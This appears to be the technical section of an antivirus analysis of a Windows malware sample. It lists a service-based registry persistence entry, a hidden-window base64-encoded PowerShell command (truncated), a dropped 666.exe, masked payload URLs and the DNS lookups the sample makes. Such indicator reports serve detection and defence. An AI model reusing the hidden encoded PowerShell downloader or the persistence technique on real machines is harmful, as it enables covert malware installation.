Technical information
- [<HKLM>\System\CurrentControlSet\Services\speedmemo] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\speedmemo] 'ImagePath' = '"%WINDIR%\SysWOW64\speedmemo.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAGgAYwBoAGEAdQB3AGcAYQBnAD0AJwBHAGkAZAB3AHcAagB3AGIAcwBtACcAOwAkAE0AeABlAHAAdgBtAG0AdQBvAHAAZgBvACAAPQAgACcANgA2ADYAJwA7ACQATAB3AGkAdwBzAHAAcwBwAHIAdABzAHIAPQAnAE0AdQBmAHcAeAB...
- %HOMEPATH%\666.exe
- %HOMEPATH%\666.exe
- %HOMEPATH%\666.exe to %WINDIR%\syswow64\speedmemo.exe
- %HOMEPATH%\666.exe
- http://os####developer.com/pay/fjlMbuIg/
- http://ba###afe.com/wp-content2/91iwhvle00-0nq1xldstn-293/
- http://15#.#83.25.24/x6RrMU4tSULv
- DNS ASK co###print.net
- DNS ASK st####tphysio.ca
- DNS ASK os####developer.com
- DNS ASK ba###afe.com
- DNS ASK wo###sales.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAGgAYwBoAGEAdQB3AGcAYQBnAD0AJwBHAGkAZAB3AHcAagB3AGIAcwBtACcAOwAkAE0AeABlAHAAdgBtAG0AdQBvAHAAZgBvACAAPQAgACcANgA2ADYAJwA7ACQATAB3AGkAdwBzAHAAcwBwAHIAdABzAHIAPQAnAE0AdQBmAHcAeAB...' (with a hidden window)